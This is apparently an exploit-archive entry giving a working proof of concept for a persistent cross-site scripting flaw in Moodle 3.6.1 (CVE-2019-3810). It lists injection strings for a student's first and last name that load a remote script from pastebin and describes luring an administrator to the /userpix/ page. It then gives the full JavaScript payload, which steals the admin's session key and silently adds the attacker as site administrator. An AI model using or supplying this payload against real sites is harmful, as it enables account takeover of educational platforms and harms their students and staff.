Exploits / Vulnerability Discovered : 2021-04-30 |
Type : webapps |
Platform : php
This exploit / vulnerability Moodle 3.6.1 persistent crosssite scripting (xss) is for educational purposes only and if it is used you will do on your own risk!
Moodle is a learning platform designed to provide educators, administrators,
and learners with a single robust, secure and integrated system to create
personalised learning environments.
The following is PoC to use the XSS bug on /userpix/ (CVE-2019-3810) for
privilege escalation from student to administrator.
1. Upload the XSS payload [1] to pastebin or other similar service.
Change the value of userid to your own id.
Let's say the URL is https://pastebin.com/raw/xxxxxxxx.
2. Login to your student account.
3. Set first name with:
" style="position:fixed;height:100%;width:100%;top:0;left:0" onmouseover="x=document.createElement
4. Set surname with:
('script');x.src='https://pastebin.com/raw/xxxxxxxx';document.body.appendChild(x); alert('XSS')
5. Ask the administrator to open /userpix/ page or put the link to that page
on your post and wait.
If successful, your account will be added as administrator.
See the demonstration video on https://github.com/farisv/Moodle-CVE-2019-3810
[1] XSS Payload for privilege escalation on Moodle. Change the value of userid to your id.
var webroot = '/';
var userid = '3';
var sesskey = '';
function get(path, success) {
var xhr = new XMLHttpRequest();
xhr.open('GET', webroot + path);
xhr.onreadystatechange = function() {
if (xhr.readyState > 3 && xhr.status == 200) {
success(xhr.responseText);
}
};
xhr.send();
return xhr;
}
function post(path, data, success) {
var xhr = new XMLHttpRequest();
xhr.open('POST', webroot + path);
xhr.onreadystatechange = function() {
if (xhr.readyState > 3 && xhr.status == 200) {
success(xhr.responseText);
}
};
xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
xhr.send(encodeURI(data));
return xhr;
}
function setAdmin() {
// Assign administrator access to userid
bpath = 'admin/roles/admins.php';
data = "confirmadd=" + userid + "&sesskey=" + sesskey;
post(bpath, data, function(data){});
}
function getSesskey(data) {
var sesskey_find = data.indexOf('"sesskey":"');
sesskey = data.substr(sesskey_find + 11, 10);
setAdmin();
}
function payload() {
// We can find Sesskey inside JS script in main page
get('', getSesskey);
}